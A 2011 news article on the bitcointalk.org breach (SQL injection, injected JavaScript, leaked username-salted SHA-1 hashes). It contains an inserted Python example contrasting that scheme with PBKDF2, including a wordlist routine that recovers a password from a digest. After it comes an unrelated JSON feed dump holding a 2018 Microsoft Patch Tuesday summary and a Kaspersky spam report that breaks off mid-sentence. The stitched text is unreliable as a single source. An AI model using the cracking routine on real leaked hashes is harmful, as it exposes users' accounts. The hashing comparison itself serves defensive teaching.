BitCoin Forum Hacked, Injected With Bill Cosby Images

Description

A hacker compromised a digital currency forum, bitcointalk.org, stealing email addresses and hashed passwords, reading messages, and, of all things, peppering the site with images of Bill Cosby, according to a report from SC Magazine.

The report claims that the attacker gained root access and started running arbitrary PHP code in early September. The compromise was not detected until a week later, when that person injected JavaScript onto the forum, causing pictures of the one-time Jell-O spokesperson and pudding enthusiast to follow users across the forum, replacing all references to BitCoin with CosbyCoin.

The attacker reportedly used SQL injection to exploit a vulnerability in the way the forum software handled escape characters in usernames and eventually purchased a donor account, using it to gain access to various user accounts and change their names, including that of the administrator, Satoshi.

Evidently the passwords were hashed with the SHA-1 algorithm and salted by combining them with usernames. In typical fashion, the administrators encouraged users to change not only their bitcointalk.org passwords, but also any similar or shared passwords for other sites and services.
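The hashing scheme described above is worth a closer look from the defender's side. The example below is added here and is not code from the article or from the forum software: it models SHA-1 over username plus password as the article describes it, shows why a public, predictable salt gives little protection once the table is stolen (the same credentials yield the same digest on every site using the scheme, and a wordlist can be tested per user at raw SHA-1 speed), and contrasts it with a random per-record salt and an iterated KDF (PBKDF2-HMAC-SHA256 from the standard library). The usernames, passwords and iteration count are constructed for the example.

```python
"""Username-as-salt SHA-1 (as described for the breach) versus a random salt
plus an iterated KDF. Added example, not the forum's or the article's code."""
import hashlib
import hmac
import os

# Constructed sample credentials for the demonstration (not real accounts).
SAMPLE_USER = "satoshi"
SAMPLE_PASSWORD = "correct horse battery staple"


def username_salted_sha1(username, password):
    """Scheme the article describes: SHA-1 over username || password.
    Deterministic, no randomness, no work factor; the 'salt' is public."""
    return hashlib.sha1((username + password).encode("utf-8")).hexdigest()


def crack_with_username_dictionary(username, digest, candidates):
    """Defender's view of the risk: whoever holds the dump can test a wordlist
    against one user's digest at native SHA-1 speed, because the salt is just
    the (known) username. Returns the matching candidate or None."""
    for candidate in candidates:
        if hmac.compare_digest(username_salted_sha1(username, candidate), digest):
            return candidate
    return None


def same_credentials_collide(username, password):
    """Two unrelated sites using the username-salt scheme store an identical
    digest for the same username/password pair, so one breach exposes the
    other. This is why the administrators' advice to change shared passwords
    matters for this scheme in particular."""
    digest_on_site_a = username_salted_sha1(username, password)
    digest_on_site_b = username_salted_sha1(username, password)
    return digest_on_site_a == digest_on_site_b


# Iteration count is a constructed value for the example; tune to your hardware.
PBKDF2_ITERATIONS = 200_000


def hash_password(password, salt=None):
    """Stronger scheme: 16 random salt bytes per record and an iterated KDF.
    Stored as iterations$salt_hex$digest_hex so the parameters travel with
    the hash and can be raised later without a flag day."""
    if salt is None:
        salt = os.urandom(16)
    derived = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return f"{PBKDF2_ITERATIONS}${salt.hex()}${derived.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    iterations, salt_hex, digest_hex = stored.split("$")
    derived = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(derived.hex(), digest_hex)


def random_salts_differ(password):
    """Same password hashed twice yields different records, so a stolen table
    cannot be cross-matched against another site's table user by user."""
    return hash_password(password) != hash_password(password)


if __name__ == "__main__":
    weak = username_salted_sha1(SAMPLE_USER, SAMPLE_PASSWORD)
    print("username-salted SHA-1:", weak)
    print("recovered from wordlist:",
          crack_with_username_dictionary(SAMPLE_USER, weak,
                                         ["123456", "password", SAMPLE_PASSWORD]))
    strong = hash_password(SAMPLE_PASSWORD)
    print("PBKDF2 record:", strong)
    print("verifies:", verify_password(SAMPLE_PASSWORD, strong))
```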

The forum has since been shut down and migrated to a new host, according to the report.

This isn’t the first time the emerging digital currency market has been targeted by online criminals. In fact, Mt. Gox, one of the most popular bitcoin exchange markets, was hacked earlier this year. Additionally, reports emerged a few weeks ago detailing the discovery of a peer-to-peer bitcoin mining botnet.


Reporter: Brian Donohue. Published: 2011-09-12. Source: https://threatpost.com/bitcoin-forum-hacked-injected-bill-cosby-images-091211/ (citing http://www.scmagazine.com.au/News/271688,bitcoin-forum-hacked-by-donor.aspx).

{"result": {"talosblog": [{"lastseen": "2018-08-14T20:32:04", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Microsoft released its monthly set of security advisories today for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 62 new vulnerabilities, 20 of which are rated \u201ccritical,\u201d 38 that are rated \u201cimportant,\u201d one that is rated moderate and one that is rated as low severity. These vulnerabilities impact Windows Operating System, Edge and Internet Explorer, along with several other products.\n\n \n\n\nIn addition to the 60 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180020 which addresses the vulnerabilities described in the Adobe Flash Security Bulletin APSB18-25.\n\n \n\n\n### Critical Vulnerabilities\n\n \n\n\nThis month, Microsoft is addressing 20 vulnerabilities that are rated \"critical.\" Talos believes 10 of these are notable and require prompt attention.\n\n \n\n\n[CVE-2018-8273](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8273>) is a remote code execution vulnerability in the Microsoft SQL Server that could allow an attacker who successfully exploits the vulnerability to execute code in the context of the SQL Server Database Engine Service account.\n\n \n\n\n[CVE-2018-8302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8302>) is a remote code execution vulnerability in the Microsoft Exchange email and calendar software that could allow an attacker who successfully exploits the vulnerability to run arbitrary code in the context of the system user when the software fails to properly handle objects in memory.\n\n \n\n\n[CVE-2018-8344](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8344>) is a remote code execution vulnerability that exists when the Windows font 
library improperly handles specially crafted embedded fonts. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. By leveraging a web-based attack, an attacker can convince a user to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. An attacker can also provide a specially crafted document that is designed to exploit the vulnerability, and then convince users to open the document file.\n\n \n\n\n[CVE-2018-8350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8350>) is a remote code execution vulnerability that exists when the Microsoft Windows PDF Library improperly handles objects in memory. An attacker who successfully exploits the vulnerability could gain the same user rights as the current user. The vulnerability can be exploited simply by viewing a website that hosts a malicious PDF file on a Windows 10 system with Microsoft Edge set as the default browser. 
On other affected systems, that do not render PDF content automatically, an attacker would have to convince users to open a specially crafted PDF document, such as a PDF attachment to an email message.\n\n \n\n\n[CVE-2018-8266](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8266>), [CVE-2018-8355](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8355>), [CVE-2018-8380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8380>), [CVE-2018-8381](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8381>) and [CVE-2018-8384](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8384>) are remote code execution vulnerabilities that exist in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge. An attacker who successfully exploits the vulnerability can potentially gain the same user rights as the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements.\n\n \n\n\n[CVE-2018-8397](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8397>) is a remote code execution vulnerability that exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. By leveraging a web-based attack, an attacker can convince a user to visit a webpage that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. 
An attacker can also provide a specially crafted document file that is designed to exploit the vulnerability, and then convince users to open the document file.\n\nOther vulnerabilities deemed \"critical\" are listed below:\n\n \n\n\n[CVE-2018-8345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8345>) LNK Remote Code Execution Vulnerability\n\n[CVE-2018-8359](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8359>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8371](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8371>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8372](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8372>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8377](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8377>) Microsoft Edge Memory Corruption Vulnerability\n\n[CVE-2018-8385](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8385>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8387](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8387>) Microsoft Edge Memory Corruption Vulnerability\n\n[CVE-2018-8390](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8390>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8403](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8403>) Microsoft Browser Memory Corruption Vulnerability\n\n### Important Vulnerabilities\n\n \n\n\nThis month, Microsoft is addressing 38 vulnerabilities that are rated \"important.\" Talos believes two of these are notable and require prompt attention.\n\n 
\n\n\n[CVE-2018-8200](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8200>) is a vulnerability that exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploits this vulnerability can potentially inject code into a trusted PowerShell process to bypass the Device Guard code integrity policy on the local machine. To exploit the vulnerability, an attacker would first have to access the local machine and then inject malicious code into a script that is trusted by the policy. The injected code would then run with the same trust level as the script and bypass the policy.\n\n \n\n\n[CVE-2018-8340](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8340>) is a vulnerability in the Windows Authentication Methods, and enables an Active Directory Federation Services (AD FS) Security Bypass vulnerability. An attacker who successfully exploits this vulnerability could bypass some, but not all, of the authentication factors.\n\n \n\n\nOther vulnerabilities deemed \"important\" are listed below:\n\n \n\n\n[CVE-2018-0952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0952>) Diagnostic Hub Standard Collector Elevation Of Privilege Vulnerability\n\n[CVE-2018-8204](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8204>) Device Guard Code Integrity Policy Security Feature Bypass Vulnerability\n\n[CVE-2018-8253](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8253>) Cortana Elevation of Privilege Vulnerability\n\n[CVE-2018-8316](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8316>) Internet Explorer Remote Code Execution Vulnerability\n\n[CVE-2018-8339](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8339>) Windows Installer Elevation of Privilege 
Vulnerability\n\n[CVE-2018-8341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8341>) Windows Kernel Information Disclosure Vulnerability\n\n[CVE-2018-8342](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8342>) Windows NDIS Elevation of Privilege Vulnerability\n\n[CVE-2018-8343](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8343>) Windows NDIS Elevation of Privilege Vulnerability\n\n[CVE-2018-8346](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8346>) LNK Remote Code Execution Vulnerability\n\n[CVE-2018-8347](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8347>) Windows Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8348](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8348>) Windows Kernel Information Disclosure Vulnerability\n\n[CVE-2018-8349](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8349>) Microsoft COM for Windows Remote Code Execution Vulnerability\n\n[CVE-2018-8351](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8351>) Microsoft Edge Information Disclosure Vulnerability\n\n[CVE-2018-8353](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8353>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8357](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8357>) Microsoft Browser Elevation of Privilege Vulnerability\n\n[CVE-2018-8358](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8358>) Microsoft Browser Security Feature Bypass Vulnerability\n\n[CVE-2018-8360](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8360>) .NET Framework Information Disclosure Vulnerability\n\n[CVE-2018-8370](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8370>) Microsoft Edge 
Information Disclosure Vulnerability\n\n[CVE-2018-8375](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8375>) Microsoft Excel Remote Code Execution Vulnerability\n\n[CVE-2018-8376](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8376>) Microsoft PowerPoint Remote Code Execution Vulnerability\n\n[CVE-2018-8378](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8378>) Microsoft Office Information Disclosure Vulnerability\n\n[CVE-2018-8379](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8379>) Microsoft Excel Remote Code Execution Vulnerability\n\n[CVE-2018-8382](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8382>) Microsoft Excel Information Disclosure Vulnerability\n\n[CVE-2018-8383](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8383>) Microsoft Edge Spoofing Vulnerability\n\n[CVE-2018-8389](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8389>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8394](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8394>) Windows GDI Information Disclosure Vulnerability\n\n[CVE-2018-8396](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8396>) Windows GDI Information Disclosure Vulnerability\n\n[CVE-2018-8398](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8398>) Windows GDI Information Disclosure Vulnerability\n\n[CVE-2018-8399](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8399>) Win32k Elevation of Privilege Vulnerability\n\n[CVE-2018-8400](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8400>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8401](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8401>) DirectX Graphics 
Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8404](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8404>) Win32k Elevation of Privilege Vulnerability\n\n[CVE-2018-8405](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8405>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8406](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8406>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8412>) Microsoft (MAU) Office Elevation of Privilege Vulnerability\n\n[CVE-2018-8414](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8414>) Windows Shell Remote Code Execution Vulnerability\n\n### Coverage\n\n \n\n\nIn response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. 
Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.\n\n \n\n\nSnort Rules:\n\n \n\n\n45877-45878, 46548-46549, 46999-47002, 47474-47493, 47495-47496, 47503-47504, 47512-47513, 47515-47520\n\n \n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/8ZjMNLg4_Bs)", "reporter": "noreply@blogger.com (Earl Carter)", "published": "2018-08-14T11:26:00", "type": "talosblog", "title": "Microsoft Tuesday August 2018", "enchantments": {"score": {"modified": "2018-08-14T20:32:04", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "blog", "cvelist": ["CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8204", "CVE-2018-8253", "CVE-2018-8266", "CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8316", "CVE-2018-8339", "CVE-2018-8340", "CVE-2018-8341", "CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8344", "CVE-2018-8345", "CVE-2018-8346", "CVE-2018-8347", "CVE-2018-8348", "CVE-2018-8349", "CVE-2018-8350", "CVE-2018-8351", "CVE-2018-8353", "CVE-2018-8355", "CVE-2018-8357", "CVE-2018-8358", "CVE-2018-8359", "CVE-2018-8360", "CVE-2018-8370", "CVE-2018-8371", "CVE-2018-8372", "CVE-2018-8373", "CVE-2018-8375", "CVE-2018-8376", "CVE-2018-8377", "CVE-2018-8378", "CVE-2018-8379", "CVE-2018-8380", "CVE-2018-8381", "CVE-2018-8382", "CVE-2018-8383", "CVE-2018-8384", "CVE-2018-8385", "CVE-2018-8387", "CVE-2018-8389", "CVE-2018-8390", "CVE-2018-8394", "CVE-2018-8396", "CVE-2018-8397", "CVE-2018-8398", "CVE-2018-8399", "CVE-2018-8400", "CVE-2018-8401", "CVE-2018-8403", "CVE-2018-8404", "CVE-2018-8405", "CVE-2018-8406", "CVE-2018-8412", "CVE-2018-8414"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-14T18:26:00", "id": "TALOSBLOG:A9E55A97439608C62C1BF62669B8074A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/8ZjMNLg4_Bs/ms-tuesday.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2018-08-14T10:31:27", "_object_types": ["robots.models.rss.RssBulletin", 
"robots.models.base.Bulletin"], "references": [], "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2014/08/08075241/quarter_spam.jpg)\n\n## Quarterly highlights\n\n### GDPR as a phishing opportunity\n\nIn the first quarter, we discussed spam designed to exploit GDPR (General Data Protection Regulation), which came into effect on May 25, 2018. Back then spam traffic was limited to invitations to participate in workshops and other educational events and purchase software or databases. We predicted that fraudulent emails were soon to follow. And we found them in the second quarter.\n\nAs required by the regulation, companies notified email recipients that they were switching to a new GDPR-compliant policy and asked them to confirm permission to store and process personal information. This was what criminals took advantage of. To gain access to the personal information of well-known companies' customers, criminals sent out phishing emails referencing the GDPR and asking recipients to update their account information. To do this, customers had to click on the link provided and enter the requested data, which immediately fell into the hands of the criminals. It must be noted that the attackers were targeting customers of financial organizations and IT service providers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122429/180810-spam-report-q2-18-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122429/180810-spam-report-q2-18-1.png>)\n\n_Phishing emails exploiting GDPR_\n\n### Malicious IQY attachments\n\nIn the second quarter, we uncovered several malspam incidents with never-before-seen IQY (Microsoft Excel Web Query) attachments. Attackers disguise these files as invoices, order forms, document copies, etc., which is a known ploy that is still actively used for malspamming. 
The From field contains addresses that look like personal emails, and names of attachments are generated in accordance with the following template: the name of the attachment, and then either a date or a random number sequence.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122440/180810-spam-report-q2-18-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122440/180810-spam-report-q2-18-2.png>)\n\n_Harmful .iqy files_\n\nWhen the victim opens the IQY file, the computer downloads several trojan-downloaders, which install the Flawed Ammyy RAT backdoor. The infection chain may look like this: Trojan-Downloader.MSExcel.Agent downloads another downloader from the same family, which, in turn, downloads Trojan-Downloader.PowerShell.Agent, then this trojan downloads Trojan-Downloader.Win32.Dapato, which finally installs the actual Backdoor.Win32.RA-based.hf (also known as Flawed Ammyy RAT) used to gain remote access to the victim's computer, steal files and personal information, and send spam.\n\nIt is rather difficult to detect these attachments because these files look like ordinary text documents which transfer web-inquiry data transfer parameters from remote sources to Excel spreadsheets. IQY files can also be a very dangerous tool in the hands of criminals because their structure is no different from the structure of legitimate files, yet they can be used to download any data at all.\n\nIt must be noted that malspam with IQY attachments is distributed via the largest botnet called Necurs. As a reminder, this is the botnet responsible for malspam (ransomware, macro-viruses, etc.), as well as pump-and-dump and dating spam. The botnet's operation is characterized by periods of spiking and idling while infection and filter evasion mechanisms become ever more sophisticated.\n\n### Data leaks\n\nThe wave of confidential information leaks we discussed in the previous quarter is still on the rise. 
Here are some of the most notable events of the quarter:\n\n * Hacking and theft of personal information of 27M Ticketfly customers;\n * 92M MyHeritage genealogy service users' personal information was discovered on a public server;\n * 340M individual records were lost by Exactis, a marketing company;\n * An unprotected Amazon server allowed access to the personal information of 48M Facebook, LinkedIn, Twitter, and Zillow users.\n\nAs a result of such leaks, cybercriminals get a hold of users' names, email addresses, phone numbers, dates of birth, credit card numbers, and personal preferences. This information may later be used to launch targeted phishing attacks, which are the most dangerous type of phishing.\n\n### Cryptocurrency\n\nIn the second quarter, our antiphishing system prevented 58,000 user attempts to connect to phishing websites masquerading as popular cryptocurrency wallets and markets. In addition to classic phishing, which aims at gaining access to the victim's accounts and private key information, cybercriminals try every way to entice a victim to willingly send them cryptocurrency. One of the examples of this are cryptocoin giveaways. Cybercriminals continue using the names of new ICO projects to collect money from potential investors that are trying to gain early access to new tokens. Sometimes phishing sites pop up before official project sites.\n\nEthereum (ETH) is currently the most popular cryptocurrency with phishers. The popularity of Ethereum with cybercriminals increases as more funds are attracted by [ICOs on the Ethereum platform](<https://www.kaspersky.ru/blog/ethereum-ico/19025/>). 
According to our very rough estimate (based on data received from over a thousand ETH wallets used by malefactors), over the Q2 2018, cybercriminals exploiting ICOs [managed to make](<https://securelist.com/in-cryptoland-trust-can-be-costly/86367/>) $2,329,317 (end-of-July-2018 exchange rate), traditional phishing not included.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122449/180810-spam-report-q2-18-3.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122449/180810-spam-report-q2-18-3.png>)\n\n_Fake ICO project pages: the first is located on fantom.pub and imitates fantom.foundation, the real site of the FANTOM project; the second one, found on sparkster.be, is an imitation of sparkster.me, the original SPARKSTER site_\n\n### World Cup 2018\n\nCybercriminals from all over the world prepared for the World Cup as much as its organizers and soccer fans. The World Cup was used in many traditional scamming methods using social engineering. Cybercriminals created fake championship partner websites to gain access to victims' bank and other accounts, carried out targeted attacks, and created [bogus fifa.com account sign-in pages](<https://securelist.ru/2018-fraud-world-cup/90108/>).\n\n### HTTPS\n\n[As mentioned in the 2017 report](<https://securelist.com/spam-and-phishing-in-2017/83833/#phishing-pages-migrate-to-https>), more and more phishing pages are now found on [certified](<https://encyclopedia.kaspersky.ru/glossary/digital-certificates/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) domains. Those may include hacked or specially registered domains that cybercriminals use to store their content. This has to do with the fact that most of the Internet is switching to HTTPS and it has become easy to get a simple certificate. 
In the middle of the second quarter, this prompted Google to [announce future efforts](<https://blog.chromium.org/2018/05/evolving-chromes-security-indicators.html>) aimed at changing the way Chrome works with certificates. Starting in September 2018, the browser (Chrome 69) will stop marking HTTPS sites as \"Secure\" in the URL bar. Instead, starting in October 2018, Chrome will start displaying the \"Not secure\" label when users enter data on unencrypted sites. \n\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10123710/180810-spam-report-q2-18-3-5.gif)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10123710/180810-spam-report-q2-18-3-5.gif>)\n\n_When Chrome 70 comes out in October 2018, a red \"Not secure\" marker will be displayed for all HTTP sites where users enter data._\n\nGoogle believes that this will make more sites use encryption. After all, users should expect the web to be safe by default and receive warnings only in the event of any issues.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122456/180810-spam-report-q2-18-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122456/180810-spam-report-q2-18-4.png>)\n\n_An example of a certified phishing website marked as \"Secure\"._\n\nAt the moment, the green Secure message in the URL bar is rather misleading for a user, especially when they visit a phishing website.\n\n### Vacation season\n\nIn anticipation of the vacation season, cybercriminals have used all of the possible topics that may interest travelers, [from airplane ticket purchases to hotel bookings](<https://www.kaspersky.com/blog/protect-your-vacation/22352>). For instance, we've found many websites that offer very tempting accommodations at absurd prices (e.g., an entire four-bedroom house in Prague with a pool and a fireplace at $1,000 a month). 
Such websites pose as Amazon, TripAdvisor, and other sites popular among travelers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122505/180810-spam-report-q2-18-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122505/180810-spam-report-q2-18-5.png>)\n\n_An example of a fake hotel booking website_\n\nA similar method is used to fake ticket aggregator websites. In these cases, the displayed flight information is real, but the tickets turn out to be fake.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122513/180810-spam-report-q2-18-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122513/180810-spam-report-q2-18-6.png>)\n\n_An example of fake airline ticket websites_\n\n## Distribution channels\n\nIn our reports, we regularly point out you that phishing and other spam has gone way beyond email a long time ago. Attackers use every means of communication at their disposal and even recruit unsuspecting users themselves for malware distribution. In this quarter, most large-scale attacks were found in messengers and on social networks.\n\n### WhatsApp\n\nCybercriminals have been using WhatsApp more frequently to distribute their content lately. WhatsApp users copy and resend spam messages themselves, just like they used to do with luck chain letters many years ago. Most of these messages contain information about fictional lotteries or giveaways (we have already discussed these types of scams many times). Last quarter, cybercriminals brought back the airplane ticket giveaways. This quarter in Russia, for instance, they used names of [popular retailers](<https://www.kaspersky.ru/blog/coupon-scam/20830>) such as Pyaterochka and Leroy Merlin, and also McDonald's. 
Some fake messages purport to come from popular sportswear brands, as well as certain stores and coffee shops.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122520/180810-spam-report-q2-18-6-5.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122520/180810-spam-report-q2-18-6-5.jpg>)\n\n_Users share messages about ticket raffles with their contacts via a messenger, since doing so is one of the conditions for winning_\n\nOnce a user has sent the message to some friends, he or she is redirected to another resource, whose content changes depending on the victim's location and device. If the user visits the site from a smartphone, they are most often automatically subscribed to paid services. The user may also be redirected to a page containing a survey or a lottery, or to some other malicious website. For instance, a user may be invited to install a browser extension which will later intercept the data they enter on other websites and act in their name online, for example by publishing posts on social media.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122527/180810-spam-report-q2-18-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122527/180810-spam-report-q2-18-7.png>)\n\n_An example of a page to which a user is redirected after a survey, at the end of which they were promised a coupon for a popular retail chain. As you can see, no coupon has been received, but the user is invited to install a browser extension with suspicious permissions._\n\n### Twitter and Instagram\n\nCybercriminals have been using Twitter to distribute fraudulent content for a long time. 
However, it has recently become a breeding ground for fake celebrity and company accounts.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122533/180810-spam-report-q2-18-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122533/180810-spam-report-q2-18-8.png>)\n\n_Fake account for Pavel Durov_\n\nThe most popular cover used by cybercriminals is cryptocurrency giveaways on behalf of celebrities. The user is asked to transfer a small amount of cryptocurrency to a certain wallet in order to get double or triple the amount back. To build trust, the wallet may be hosted on a separate website, which also shows a list of fake transactions that the victim can watch \"updating\" in real time, purporting to confirm that anyone who transfers money to the wallet gets back several times the amount sent. Of course, the victim receives nothing. Despite the simplicity of this scheme, it makes cybercriminals millions of dollars. This quarter, cybercriminals favoured the names of Elon Musk, Pavel Durov, and Vitalik Buterin in their schemes. These names were chosen for a reason: Elon Musk is an entrepreneur, inventor, and investor, while Durov and Buterin made it onto the cryptocurrency market leader list [published by Fortune](<http://fortune.com/the-ledger-40-under-40>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122541/180810-spam-report-q2-18-9.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122541/180810-spam-report-q2-18-9.png>)\n\n_An example of a website advertised on Elon Musk's fake account_\n\nNews sensations make these schemes even more effective. For instance, the blocking of the Telegram messenger in Russia generated a wave of fake messages from \"Pavel Durov\" promising compensation. In these cases cybercriminals use similarly-spelled account names. 
